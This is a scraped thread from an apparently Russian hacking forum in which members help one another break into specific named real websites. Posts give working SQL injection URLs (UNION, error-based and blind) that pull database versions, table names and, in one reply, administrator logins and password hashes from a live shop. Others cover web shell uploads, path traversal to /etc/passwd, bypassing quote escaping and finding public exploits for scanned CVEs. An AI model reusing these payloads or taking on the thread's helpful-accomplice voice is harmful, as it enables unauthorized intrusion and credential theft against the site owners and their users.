https://www.filmakademie.de/de/aktu...enbank/suche/details/?tx_wfqbe_pi1[uid]=11122 (https://www.filmakademie.de/de/aktuelles-projekte/projekt-datenbank/suche/details/?tx_wfqbe_pi1%5Buid%5D=11122)
как можно раскрутить? кроме блинда
есть такой код ,выводит только список файлов и папок в директорий , если сделать ../../../../../../../etc/passwd то пишет tmp array , а если ../../../../../../../etc то покажет список всех файлов и папок в директории.
Вопрос ,реально ли прочитать содержимое файла через этот код?
PHP:
';
echo"".sys_get_temp_dir() ."
";
$path="../images/";
if ($_REQUEST["path"])$path=$_REQUEST["path"] .'/';
$dir= newGame_Tool_Disk_Directory($path, array (
"png",
"gif",
"jpg",
"jpeg"));
print_r($dir->getDirs());
echo'';
print_r($dir->getFiles());
echo'';
if ($dir->getDirCount()) {
while ($directory=$dir->nextDir() ) {
echo"[".$directory."]
";
}
}
echo'';
if ($dir->getFileCount()) {
while ($file=$dir->nextFile() ) {
echo"[".$file."]
";
echo"
";
}
}
winstrool
22.09.2016, 01:21
swat_ said:
↑ (https://antichat.live/posts/3993933/)
есть такой код ,выводит только список файлов и папок в директорий , если сделать ../../../../../../../etc/passwd то пишет tmp array , а если ../../../../../../../etc то покажет список всех файлов и папок в директории.
Вопрос ,реально ли прочитать содержимое файла через этот код?
PHP:
';
echo"".sys_get_temp_dir() ."
";
$path="../images/";
if ($_REQUEST["path"])$path=$_REQUEST["path"] .'/';
$dir= newGame_Tool_Disk_Directory($path, array (
"png",
"gif",
"jpg",
"jpeg"));
print_r($dir->getDirs());
echo'';
print_r($dir->getFiles());
echo'';
if ($dir->getDirCount()) {
while ($directory=$dir->nextDir() ) {
echo"[".$directory."]
";
}
}
echo'';
if ($dir->getFileCount()) {
while ($file=$dir->nextFile() ) {
echo"[".$file."]
";
echo"
";
}
}
Тут бы класс посмотреть Game_Tool_Disk_Directory, что в нем прописано, ну а логика кода подсказывает что нет
Подскажите как узнать путь до конфига Microsoft IIS.На линуксе знаю что /etc/passwd,httpd.conf и тд
какие способы есть заливки шелла в eCom ?
PHP:
';
?>
¡ES INCORRECTO!
Elegiste a $aux como el autor del poema:";
echo"
";
// Imprime el quote segun el parametro pasado por url $idquote
$query="SELECT * FROM cms_stories where sid =$idquot e";
$result=mysql_query($query)
or die ("no anda num 3");
while ($row=mysql_fetch_array($result))
{
$aux=utf8_encode($row['hometext']);
}
echo"$aux";
echo"
";
// Imprime el autor segun el parametro pasado por url $idautor
$query="SELECT * FROM cms_topics where topicid =$ida utor2";
$result=mysql_query($query)
or die ("no anda num 3");
while ($row=mysql_fetch_array($result))
{
$aux=utf8_encode($row['topicname']);
}
echo"Sin embargo, $aux es quien lo escribió.";
echo"
";
if ($_COOKIE['whowrong'] +$_COOKIE['whoright'] +1!=10)
{
$nextq=$_COOKIE['whowrong'] +$_COOKIE['whoright'] +2;
echo"PRÓXIMO POEMA ($nextqde 10)";
echo"
Reiniciar juego";
}
else
{
echo"FIN. Enviar tu puntaje.";
}
mysql_close($conecta);
?>
PlataOPlomo
23.09.2016, 18:47
http://analitpribor.com/bank.php?section=products/bank&item=bankmebelf
у кого нибудь получится локальный инклуд раскрутить?) Парился, парился, не получилось)
Ядовитый ноль похоже не работает, заинклудить ничего не удалось
Octavian
24.09.2016, 02:10
помогите разобратся с постом
/threads/50669/#post-1330014 (https://antichat.live/threads/50669/)
у меня
phpMyAdmin 2.11.9.2
кто сталкивался?
pomogite ispravit kod
uyazvim k sql union/based time/blind
proboval parametr intval() no togda nichego ne rabotaet
PHP:
';$data.="\n";$icononro=0;//if ($tipolinea=="plural") {foreach ($ids as $id) {
$icononro++;
$sqlcontexto="";
if ($id=="Contexto")$sqlcontexto="AND SUBSTRING(comienza,1,4) >=$mincomienzaAND SUBSTRING(comienza,1,4) ';
//$texto = str_replace("\"",""",$rowchequeo['texto']);
//$texto = htmlentities($rowchequeo['texto']);
$texto="";
if ($id=="Contexto")$texto.="CONTEXTO HISTÓRICO
";
$texto.=$rowchequeo['texto'];
if ($tipolinea=="plural"AND$id!="Contexto")$texto="(".$rowchequeo['escritor'] .")
".$texto;$texto=str_replace("",">",$texto);$texto=str_replace("&","&",$texto);$data.=$texto;
$fechafinal="";
if ($rowchequeo['termina']!="0000-00-00 00:00:00") {$fechafinal.="desde ";
}$fecha1=substr($rowchequeo['comienza'],0,10);$fecha1=explode("-",$fecha1);
if ($fecha1['2']!='00') {$fechafinal.=$fecha1['2'];
if ($fecha1['1']!='00')$fechafinal.=" de ";
}
if ($fecha1['1']!='00')$fechafinal.=$mes[$fecha1['1']]." de ";
$fechafinal.=$fecha1['0'];
if ($rowchequeo['termina']!="0000-00-00 00:00:00") {$fechafinal.=" hasta ";$fecha2=substr($rowchequeo['termina'],0,10);$fecha2=explode("-",$fecha2);
if ($fecha2['2']!='00') {$fechafinal.=$fecha2['2'];
if ($fecha2['1']!='00')$fechafinal.=" de ";
}
if ($fecha2['2']!='00')$fechafinal.=$mes[$fecha2['1']]." de ";
$fechafinal.=$fecha2['0'];
}
$data.=htmlentities("
").'Fecha: '.$fechafinal.htmlentities("");
if ($rowchequeo['tipo_evento']!="Nacimiento") {//echo "nac".substr($nacimiento,0,10)."acon".substr($startdate,0,10)."..".strtotime(str_replace("-","/",substr($startdate,0,10)));
//echo "**".str_replace("-","/",substr($startdate,0,10));
if ( ($id!="Contexto"ANDstrpos($rowchequeo['tipo_evento'],"stumo")==false) OR ($id=="Contexto"AND$tipolinea=="singular")) {$data.=htmlentities("
Edad: ").birthday_poemas(substr($nacimiento,0,10),substr( str_replace("-","/",$startdate),0,10)).htmlentities(" años");
if ($rowchequeo['termina']!="0000-00-00 00:00:00")$data.=" al comenzar";$data.=htmlentities("");
}
}
if ($rowchequeo['lugar']!="") {$data.=htmlentities("
").'Lugar: '.$rowchequeo['lugar'].htmlentities("
");$buscarlugar=str_replace(", ",",+",$rowchequeo['lugar']);$data.=htmlentities(utf8_decode(''));
}
$data.='';
}// fin de while} // fin de foreach$data .= '';
echo$data;$data=addslashes($data);$query="INSERT INTO wp_extras_relacionados (refid, ite mid, tipo, texto) VALUES ('33','33', '$urllin ea','$data')";$result=mysql_query($query)
or die(mysql_error());
}mysql_close($conectausuario);?>[php]
RWD said:
↑ (https://antichat.live/posts/3994895/)
pomogite ispravit kod
uyazvim k sql union/based time/blind
proboval parametr intval() no togda nichego ne rabotaet
PHP:
';$data.="\n";$icononro=0;//if ($tipolinea=="plural") {foreach ($ids as $id) {
$icononro++;
$sqlcontexto="";
if ($id=="Contexto")$sqlcontexto="AND SUBSTRING(comienza,1,4) >=$mincomienzaAND SUBSTRING(comienza,1,4) ';
//$texto = str_replace("\"",""",$rowchequeo['texto']);
//$texto = htmlentities($rowchequeo['texto']);
$texto="";
if ($id=="Contexto")$texto.="CONTEXTO HISTÓRICO
";
$texto.=$rowchequeo['texto'];
if ($tipolinea=="plural"AND$id!="Contexto")$texto="(".$rowchequeo['escritor'] .")
".$texto;$texto=str_replace("",">",$texto);$texto=str_replace("&","&",$texto);$data.=$texto;
$fechafinal="";
if ($rowchequeo['termina']!="0000-00-00 00:00:00") {$fechafinal.="desde ";
}$fecha1=substr($rowchequeo['comienza'],0,10);$fecha1=explode("-",$fecha1);
if ($fecha1['2']!='00') {$fechafinal.=$fecha1['2'];
if ($fecha1['1']!='00')$fechafinal.=" de ";
}
if ($fecha1['1']!='00')$fechafinal.=$mes[$fecha1['1']]." de ";
$fechafinal.=$fecha1['0'];
if ($rowchequeo['termina']!="0000-00-00 00:00:00") {$fechafinal.=" hasta ";$fecha2=substr($rowchequeo['termina'],0,10);$fecha2=explode("-",$fecha2);
if ($fecha2['2']!='00') {$fechafinal.=$fecha2['2'];
if ($fecha2['1']!='00')$fechafinal.=" de ";
}
if ($fecha2['2']!='00')$fechafinal.=$mes[$fecha2['1']]." de ";
$fechafinal.=$fecha2['0'];
}
$data.=htmlentities("
").'Fecha: '.$fechafinal.htmlentities("");
if ($rowchequeo['tipo_evento']!="Nacimiento") {//echo "nac".substr($nacimiento,0,10)."acon".substr($startdate,0,10)."..".strtotime(str_replace("-","/",substr($startdate,0,10)));
//echo "**".str_replace("-","/",substr($startdate,0,10));
if ( ($id!="Contexto"ANDstrpos($rowchequeo['tipo_evento'],"stumo")==false) OR ($id=="Contexto"AND$tipolinea=="singular")) {$data.=htmlentities("
Edad: ").birthday_poemas(substr($nacimiento,0,10),substr( str_replace("-","/",$startdate),0,10)).htmlentities(" años");
if ($rowchequeo['termina']!="0000-00-00 00:00:00")$data.=" al comenzar";$data.=htmlentities("");
}
}
if ($rowchequeo['lugar']!="") {$data.=htmlentities("
").'Lugar: '.$rowchequeo['lugar'].htmlentities("
");$buscarlugar=str_replace(", ",",+",$rowchequeo['lugar']);$data.=htmlentities(utf8_decode(''));
}
$data.='';
}// fin de while} // fin de foreach$data .= '';
echo$data;$data=addslashes($data);$query="INSERT INTO wp_extras_relacionados (refid, ite mid, tipo, texto) VALUES ('33','33', '$urllin ea','$data')";$result=mysql_query($query)
or die(mysql_error());
}mysql_close($conectausuario);?>[php]
Банально mysql_real_escape_string(); попробуй.
Как можно обойти магические кавычки в insert? (кавычки заменяются на обратный слэш.)
Octavian
25.09.2016, 16:40
nik1201 said:
↑ (https://antichat.live/posts/3994941/)
Как можно обойти магические кавычки в insert? (кавычки заменяются на обратный слэш.)
\'
[QUOTE="Octavian"]
Octavian said:
↑ (https://antichat.live/posts/3995053/)
\'
Octavian
26.09.2016, 18:11
все должно сработать просто параметров должно быть 2 > WHERE login='\' and password='+union+select+1,2+--+'
nik1201 said:
↑ (https://antichat.live/posts/3995332/)
У меня вот это выдает при фрагментированной SQL Injection.
HTML:
SQL: select count(*) userNum from pre_common_member where username='qweqweqweqweqweqweqweqweqweqweqweqweqweq weqweqqqweqweqweqweqweg\'
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''qweqweqweqweqweqweqweqweqweqweqweqweqweqweqweqqq weqweqweqweqweg\'' at line 1
Errno.: 1064
походу там только один параметр login, селект видимо идёт перед insert, только не очень понятно зачем и что инсертится
хотя тут похоже ничего не сделать, имхо раз селект падает - до insert дело не доходит, а пройти селект и заюзать фрагментацию похоже не получится
в инсерте кроме логина что нить уходит?
winstrool
26.09.2016, 18:31
nik1201 said:
↑ (https://antichat.live/posts/3995332/)
У меня вот это выдает при фрагментированной SQL Injection.
HTML:
SQL: select count(*) userNum from pre_common_member where username='qweqweqweqweqweqweqweqweqweqweqweqweqweq weqweqqqweqweqweqweqweg\'
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''qweqweqweqweqweqweqweqweqweqweqweqweqweqweqweqqq weqweqweqweqweg\'' at line 1
Errno.: 1064
Светите ссылку, может сможем, что то расковырять, а так только к бабке на картах гадать....
t0ma5 said:
↑ (https://antichat.live/posts/3995478/)
походу там только один параметр login, селект видимо идёт перед insert, только не очень понятно зачем и что инсертится
хотя тут похоже ничего не сделать, имхо раз селект падает - до insert дело не доходит, а пройти селект и заюзать фрагментацию похоже не получится
в инсерте кроме логина что нить уходит?
Insert такой.
Code:
insert into pre_common_member(groupid,username,password,regdat e,email,loginName) values(10,'qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq qqqqqqqqqqqqqqqqqqqqqqqqq','0000000',1474976900,'f ear@77.aa','')
Делаю я так.
1)Регистрирую любой акк на главной странице сайта,допустим "fear@77.aa (mailto:fear@77.aa)" и пароль "123" (регистрация прошла).
2)Грузится вторая страница,на ней мне предлагают ввести ник,ввожу q[64]' мне выдает вот это
Code:
SQL: select count(*) userNum from pre_common_member where username='qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq qqqqqqqqqqqqqqqqqqqqqqqq/'
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq qqqqqqqqqqqqqqqq/'' at line 1
Errno.: 1064
Вот только не могу понять почему вместо пароля идут 0000000,хотя пароль же 123.
Движок сайта Discuz!
Получил доступ к юзеру с грантами только на селект.
Code:
+---------------------------------------------------------------------------------------------------------+
| Grants for user@% |
+---------------------------------------------------------------------------------------------------------+
| GRANT USAGE ON *.* TO 'user'@'%' IDENTIFIED BY PASSWORD '*' |
| GRANT SELECT ON `phpbb3`.* TO 'user'@'%' |
+---------------------------------------------------------------------------------------------------------+
База соответственно от форума phpbb3. Цель либо залить шелл либо повысить привилегии. Есть идеи что можно предпринять? Из очевидных вариантов вижу только брут пароля админа, а затем залитие шелла через админку форума. Как я понял в базе еще хранятся сессии, но походу они привязаны к IP, ибо подставновка кук не работает, либо я криво это сделал.
SergioBlog
29.09.2016, 17:55
$file = trim($_GET['file']);
$folder = 'include/';
if(file_exists($folder.$file))
можно ли как-то обойти? чтобы прочитать файл из директории выше
SergioBlog said:
↑ (https://antichat.live/posts/3996574/)
$file = trim($_GET['file']);
$folder = 'include/';
if(file_exists($folder.$file))
можно ли как-то обойти? чтобы прочитать файл из директории выше
а в чем проблема? trim не удаляется точки и слеши, впрочем и file_exists файлы не читает странный кусок кода!
SergioBlog
29.09.2016, 18:13
Не полностью скинул, далее файл качается по такому адресу, если в GET вставить имя файла, то он отдается из директории include
SergioBlog said:
↑ (https://antichat.live/posts/3996586/)
Не полностью скинул, далее файл качается по такому адресу, если в GET вставить имя файла, то он отдается из директории include
ну должно работать, хз может там open_basedir или таки там подставляется расширение файла, а ты его пытаешь нул байтом откинуть( а его trim режет )
Сканил сайт акаунтексом теперь когда захожу на сайт такая херня это что значит ?
http://s8.hostingkartinok.com/uploads/images/2016/09/5024282793bd477aef007a597bcea981.png
Sensoft said:
↑ (https://antichat.live/posts/3996615/)
Сканил сайт акаунтексом теперь когда захожу на сайт такая херня это что значит ?
http://s8.hostingkartinok.com/uploads/images/2016/09/5024282793bd477aef007a597bcea981.png
ты задрочил сайт и мускул немного прилег
приходи через час)
t0ma5 said:
↑ (https://antichat.live/posts/3996620/)
ты задрочил сайт и мускул немного прилег
приходи через час)
Я думал сканер какой то запрос проложил что вывел инфу о MySQL
Кстати мож ты объяснишь
Короче сканил один магаз так они когда заходили в админку им показывало акаунтикс XSS и сделать они короче не чего не могли )
Это что было я так и не понял
Sensoft said:
↑ (https://antichat.live/posts/3996622/)
Я думал сканер какой то запрос проложил что вывел инфу о MySQL
Кстати мож ты объяснишь
Короче сканил один магаз так они когда заходили в админку им показывало акаунтикс XSS и сделать они короче не чего не могли )
Это что было я так и не понял
User 'wor647_f' has exceeded the 'max_queries_per_hour' resource (current value: 100000)
вот эта строка всё объясняет, там лимит запросов для mysql юзера
когда заходили в админку... ну вангую такую историю, среднестатистический мазагин с само собой всякими плагинами, для магазина очень важно его seo, и где то в админке должна отображаться инфа о том кто шарится по сайту( рефа/юзер агент ), вероятно сканер пихал xss в рефу или юзер агент, ну она(xss) и отработала
либо банально админка показывает неудачные попытки входа(обычно там показывается логин с которым пытались авторизоваться) - фильтрации если нет, то xss
вообще вариантов дофига может быть
t0ma5 said:
↑ (https://antichat.live/posts/3996626/)
User 'wor647_f' has exceeded the 'max_queries_per_hour' resource (current value: 100000)
вот эта строка всё объясняет, там лимит запросов для mysql юзера
когда заходили в админку... ну вангую такую историю, среднестатистический мазагин с само собой всякими плагинами, для магазина очень важно его seo, и где то в админке должна отображаться инфа о том кто шарится по сайту( рефа/юзер агент ), вероятно сканер пихал xss в рефу или юзер агент, ну она(xss) и отработала
либо банально админка показывает неудачные попытки входа(обычно там показывается логин с которым пытались авторизоваться) - фильтрации если нет, то xss
вообще вариантов дофига может быть
Спасибо )
Octavian
01.10.2016, 20:23
неполучяется залить шелл
http://alianta-imobiliara.md/admin/?mod=realty&op=edit&id=526
Octavian said:
↑ (https://antichat.live/posts/3997350/)
неполучяется залить шелл
http://alianta-imobiliara.md/admin/?mod=realty&op=edit&id=526
Я криво залил он короче не работал
Ребят срочно нужна помощь от людей которые знают толк в серверах
.SpoilerTarget" type="button">Spoiler: Картинка
http://s8.hostingkartinok.com/uploads/images/2016/10/660f94ef5e692094e587919b19c69d16.png
Кто знает эксплоиты на те уязвимости которые на скрине ?
Срочно нужна любая инфа
Sensoft said:
↑ (https://antichat.live/posts/3997430/)
Ребят срочно нужна помощь от людей которые знают толк в серверах
Spoiler: Картинка
http://s8.hostingkartinok.com/uploads/images/2016/10/660f94ef5e692094e587919b19c69d16.png
Кто знает эксплоиты на те уязвимости которые на скрине ?
Срочно нужна любая инфа
Почему не можешь загуглить ? Если с тобой и поделятся, так паблик сплойтом, который ты и сам можешь найти введя запрос в гугл.
pw0ned said:
↑ (https://antichat.live/posts/3997434/)
Почему не можешь загуглить ? Если с тобой и поделятся, так паблик сплойтом, который ты и сам можешь найти введя запрос в гугл.
Правда искал, выводит тупо инфа которая в нексусе есть
Можешь тот же паблик кинуть ? или название в Metasploit
pw0ned said:
↑ (https://antichat.live/posts/3997434/)
Почему не можешь загуглить ? Если с тобой и поделятся, так паблик сплойтом, который ты и сам можешь найти введя запрос в гугл.
Так что не поможешь ?)
Sensoft said:
↑ (https://antichat.live/posts/3997510/)
Так что не поможешь ?)
Не обязательно ищи в гугле, пробуй такие поисковики как Bing,duckduckgo, там тоже часто выводит инфу о сплойтах.
pw0ned said:
↑ (https://antichat.live/posts/3997513/)
Не обязательно ищи в гугле, пробуй такие поисковики как Bing,duckduckgo, там тоже часто выводит инфу о сплойтах.
Да ща проблема меня не один браузер теперь не пускает на localhost:8834/ (https://localhost:8834/) (Nessus) раньше хоть гугл разрешал пройти хоть и ругался а щас и он не разрешает
http://s8.hostingkartinok.com/uploads/images/2016/10/d1b0a318244cdad2f03bd1ea6895aac2.png
Ребят нужны эксплоиты на эти дыры
PHP 7.0.x (CVE-2016-5093)
[/B][/SIZE]
[/B][/SIZE]
[/B][/SIZE]
[/B][/SIZE]
BabaDook
11.10.2016, 22:33
man474019 said:
↑ (https://antichat.live/posts/3996554/)
Hi guys
https://rdot.org/forum/images/smilies/light_skin/smile.gif
please, help with this..I don't know what happens wrong here
http://www.contact.az/cntr.php?indx...)/*!5000from*/(information_schema.tables))))) (http://www.contact.az/cntr.php?indx=1|(extractvalue(1,/*!5000concat*/(0x3b,(select(mid(/*!5000group_concat*/(table_name),1,32))/*!5000from*/(information_schema.tables))))))
Хз куда делся мой пост.
PHP:
http://www.contact.az/cntr.php?indx=1+ and extractvalue(0x0a,/*!12345concat*/(0x0a,(select /*!12345table_name*/ from /*!12345information_schema.tables*/ where table_schema=database() limit 0,1)))
Ребят программа тут видит SQL injection Oracle, мамп не видит, может кто поможет раскрутить хотя бя до версии или запрос на мамп поставить нормальный что бы тот читал уязвимость
https://kaspi.kz/shop/p/doctor-plusheva-chemodanchik-doktora-10500292/
Octavian
12.10.2016, 23:15
Sensoft said:
↑ (https://antichat.live/posts/4001267/)
Ребят программа тут видит SQL injection Oracle, мамп не видит, может кто поможет раскрутить хотя бя до версии или запрос на мамп поставить нормальный что бы тот читал уязвимость
https://kaspi.kz/shop/p/doctor-plusheva-chemodanchik-doktora-10500292/
ГДЕ?
ПОСТ ЗАПРОС?
Octavian said:
↑ (https://antichat.live/posts/4001268/)
ГДЕ?
ПОСТ ЗАПРОС?
Да хер знат мож когда переадресация, мамп там чёт увидел но не раскрутил
Octavian
12.10.2016, 23:28
Sensoft said:
↑ (https://antichat.live/posts/4001270/)
Да хер знат мож когда переадресация, мамп там чёт увидел но не раскрутил
Чем сканил?
Octavian said:
↑ (https://antichat.live/posts/4001275/)
Чем сканил?
Дампером парсил
Octavian
12.10.2016, 23:30
Sensoft said:
↑ (https://antichat.live/posts/4001270/)
Да хер знат мож когда переадресация, мамп там чёт увидел но не раскрутил
Мамп ошибается
Octavian said:
↑ (https://antichat.live/posts/4001277/)
Мамп ошибается
https://kaspi.kz/resources/js/k_stat_assistant?v=) (https://kaspi.kz/resources/js/k_stat_assistant?v=%29)
Я понимаю что это не SQL но всё же мож как то можно раскрутить
Octavian
12.10.2016, 23:39
Sensoft said:
↑ (https://antichat.live/posts/4001280/)
https://kaspi.kz/resources/js/k_stat_assistant?v=) (https://kaspi.kz/resources/js/k_stat_assistant?v=%29)
Я понимаю что это не SQL но всё же мож как то можно раскрутить
нет тут ничево
Добрый день, можно вопрос по раскрутке уязвимости руками
http://gear.rajber.sk/index.php?starting=7' пытаюсь руками через юнион определить кол-во столбцов, но не получается, что я не так мб делаю или данная уязвимость не раскручивается? постоянно одна и та же ошибка "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1 --, 7' at line 1"
Bobrenz said:
↑ (https://antichat.live/posts/4001818/)
Добрый день, можно вопрос по раскрутке уязвимости руками
http://gear.rajber.sk/index.php?starting=7
' пытаюсь руками через юнион определить кол-во столбцов, но не получается, что я не так мб делаю или данная уязвимость не раскручивается? постоянно одна и та же ошибка "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1 --, 7' at line 1"
http://gear.rajber.sk/index.php?starting=7+union+select+1,2,3,4,5,6,7,8+
Снизу вроде вывод.
BabaDook said:
↑ (https://antichat.live/posts/4001824/)
Не вроде, а точно, кстати, я не смог её раскрутить. Вы есть тру хакер
Я в раскрутке руками нубло )
BabaDook said:
↑ (https://antichat.live/posts/4001834/)
http://gear.rajber.sk/index.php?sta..._name,5,5+from+information_schema. tables+--+- (http://gear.rajber.sk/index.php?starting=7+union+select+1,2,user(),4,5,d atabase(),table_name,5,5+from+information_schema.t ables+--+-)
У меня так вышло, кто герой?
топчик
Ты конечно
BabaDook said:
↑ (https://antichat.live/posts/4001836/)
Это лесть
Лучше научи меня хорошо щелкать скули ручками )
BabaDook said:
↑ (https://antichat.live/posts/4001844/)
Это надо к ярбабину, он мастер. Он эти скули на раз, два байпасит. Настоящий Хард это с вафом воевать.
У меня и так если возникают вопросы, я все к нему и к нему )
Кажется мне, устал он от меня )
BabaDook
14.10.2016, 16:18
pw0ned said:
↑ (https://antichat.live/posts/4001845/)
У меня и так если возникают вопросы, я все к нему и к нему )
Кажется мне, устал он от меня )
Куда ему деваться , сам виноват, если надо могу кинуть сайт где в основном sql , туда парни постят и надо раскручивать их .
Парни, вы уж извините вот еще такой вариант
http://www.gameliner.nl/index.php?categoryid=1 с кавычками есть ошибка пытался с комментированием и без комментирования , но вывод так и не нашел, мб просто нет ничего? или криворукость и отсутствие опыта..дает о себе знать?
BabaDook said:
↑ (https://antichat.live/posts/4001846/)
Куда ему деваться , сам виноват, если надо могу кинуть сайт где в основном sql , туда парни постят и надо раскручивать их .
Буду благодарен )
Bobrenz said:
↑ (https://antichat.live/posts/4001847/)
Парни, вы уж извините вот еще такой вариант
http://www.gameliner.nl/index.php?categoryid=1
с кавычками есть ошибка пытался с комментированием и без комментирования , но вывод так и не нашел, мб просто нет ничего? или криворукость и отсутствие опыта..дает о себе знать?
Code:
~$ curl -s -k 'http://www.gameliner.nl/review/1615&&(1)=(1)and(extractvalue(0x0a,concat(0x0a,(select(v ersion())))))/mafia-iii'
Mysql failure:
-----------------------------
Query:
SELECT r.id as id, r.score as score, bericht, u.titel as uitgever_titel, k.medewerker AS auteur,
g.id as game_id, p.titel as titel, pl.id as platform_id, pl.titel as platform, p.ean AS ean, keywords
FROM reviews AS r
LEFT OUTER JOIN klanten AS k ON k.id = r.auteur_id
LEFT OUTER JOIN games AS g ON r.game_id = g.id
LEFT OUTER JOIN platformen AS pl ON g.platform_id = pl.id
LEFT OUTER JOIN producten AS p ON p.game_id = g.id
LEFT OUTER JOIN uitgevers AS u ON u.id = g.uitgever_id
WHERE r.id = 1615&&(1)=(1)and(extractvalue(0x0a,concat(0x0a,(select(v ersion())))))
Error: XPATH syntax error: '
5.1.73'
5.1.73
Помогите раскрутить/ обойти фильтр
Code:
https://visionusasupplies.com/-pr_id-47' or 0--+ - так изначальный товар
https://visionusasupplies.com/-pr_id-47' or 1--+ - совсем другой
https://visionusasupplies.com/-pr_id-47' or 1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53, 54--+
54 поля, но ничего не выводит
Спасибо BabaDook (https://antichat.live/members/263150/) и qqq1457 (https://antichat.live/members/291561/)
BabaDook
14.10.2016, 21:54
wkar said:
↑ (https://antichat.live/posts/4001956/)
Помогите раскрутить/ обойти фильтр
Code:
https://visionusasupplies.com/-pr_id-47' or 0--+ - так изначальный товар
https://visionusasupplies.com/-pr_id-47' or 1--+ - совсем другой
https://visionusasupplies.com/-pr_id-47' or 1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53, 54--+
54 поля, но ничего не выводит
Буду благодарен за любую помощь.
Слепая?
крути как слепую
https://visionusasupplies.com/-pr_id-47'+and+substring(version(),1,1)=5+--+
https://visionusasupplies.com/-pr_i...((select+id+from+users+limit+1,1),1,1))>1+--+ (https://visionusasupplies.com/-pr_id-47'+and+ascii(substring((select+id+from+users+limi t+1,1),1,1))%3E1+--+)
https://visionusasupplies.com/-pr_i...select+name+from+users+limit+1,1),1,1))>1+--+ (https://visionusasupplies.com/-pr_id-47'+and+ascii(substring((select+name+from+users+li mit+1,1),1,1))%3E1+--+)
пример тут
http://www.truehackers.ru/articles/vulnerabilities/4102-sql-injection-vzlom-v-slepuju
wkar said:
↑ (https://antichat.live/posts/4001956/)
Помогите раскрутить/ обойти фильтр
Code:
https://visionusasupplies.com/-pr_id-47' or 0--+ - так изначальный товар
https://visionusasupplies.com/-pr_id-47' or 1--+ - совсем другой
https://visionusasupplies.com/-pr_id-47' or 1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53, 54--+
54 поля, но ничего не выводит
Спасибо
BabaDook (https://antichat.live/members/263150/)
и
qqq1457 (https://antichat.live/members/291561/)
https://visionusasupplies.com/images/categories/category_43category_image.php
пас в личке
народ, подскажите как такое крутить?
http://www.gamepowerbazaar.com/stor...=Silkroad Online&dbId=183&goldId=80&epinId=80 (http://www.gamepowerbazaar.com/store/comersus_listGames.asp?gameName=Silkroad%20Online&dbId=183&goldId=80&epinId=80)
уязвимость http://www.gamepowerbazaar.com/store/comersus_listGames.asp?gameName=Silkroad Online&dbId=183 (http://www.gamepowerbazaar.com/store/comersus_listGames.asp?gameName=Silkroad%20Online&dbId=183) вот тут, а дальше пытаюсь через юнион не особо получается.
BabaDook
16.10.2016, 21:14
Bobrenz said:
↑ (https://antichat.live/posts/4002285/)
народ, подскажите как такое крутить?
http://www.gamepowerbazaar.com/store/comersus_listGames.asp?gameName=Silkroad Online&dbId=183&goldId=80&epinId=80 (http://www.gamepowerbazaar.com/store/comersus_listGames.asp?gameName=Silkroad%20Online&dbId=183&goldId=80&epinId=80)
уязвимость
http://www.gamepowerbazaar.com/store/comersus_listGames.asp?gameName=Silkroad Online&dbId=183 (http://www.gamepowerbazaar.com/store/comersus_listGames.asp?gameName=Silkroad%20Online&dbId=183)
вот тут, а дальше пытаюсь через юнион не особо получается.
Через юнион и не будет
BabaDook said:
↑ (https://antichat.live/posts/4002525/)
Через юнион и не будет
может подскажите как? я дальше сам буду ковырять
никогда не останавливайся на скули которая не выводится,если есть рядом другая более удобная
http://www.gamepowerbazaar.com//store/sssDetay.asp?sssId=0+UNION+SELECT+1,2,3
вывод увидишь
пример:
http://www.gamepowerbazaar.com//sto...1,2,TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLE S (http://www.gamepowerbazaar.com//store/sssDetay.asp?sssId=0+UNION+SELECT+1,2,TABLE_NAME+F ROM+INFORMATION_SCHEMA.TABLES)
фильтруются скобки походу ()
p.s.
.SpoilerTarget" type="button">Spoiler: или так
p.s. можно havi' ем ,то есть подставляешь все данные как на рисунке:
http://i67.tinypic.com/23wk64l.jpg
то есть получаем вывод через error base sql injection
затем уже ручками выводим логины+ пассы
http://www.gamepowerbazaar.com//sto...adminName,adminPassword+FROM+admins+limit+0, 1 (http://www.gamepowerbazaar.com//store/sssDetay.asp?sssId=0+UNION+SELECT+1,adminName,admi nPassword+FROM+admins+limit+0,1)
1й админ
http://www.gamepowerbazaar.com//sto...adminName,adminPassword+FROM+admins+limit+1, 1 (http://www.gamepowerbazaar.com//store/sssDetay.asp?sssId=0+UNION+SELECT+1,adminName,admi nPassword+FROM+admins+limit+1,1)
2й админ
админку не искал ,да и странные пароли админов
а вообще это "commersus shop" .они уязвимы
вот почитай как пароли расшифровать
http://downloads.securityfocus.com/vulnerabilities/exploits/backoffice_mult_exp.pl
вот.
Есть форма с ХSS в поле регистрации , но также есть токен , который не позволяет скопировать форму и юзать ее с хостинга . В таком случае никак не получится воспользоватся уязвимостю ? Или можно post переделать в get как то ?
найдена дырка в http://www.gamers-forum.com/misc.php тип инъекции (post) воот с такими параметрами, vsa_send=Submit&amount=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22X OR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&chooser=5&securitytoken=guest
пробовал через мап и хавидж, на большее пока меня не хватило, подскажите есликто знает, как с этим дальше бороться?
WallHack
03.11.2016, 14:18
Из-за Mod_Security не могу достоверно проверить, есть ли LFI
тут _ttp://kor.dk/musik/vespa/getid3/getid3.php
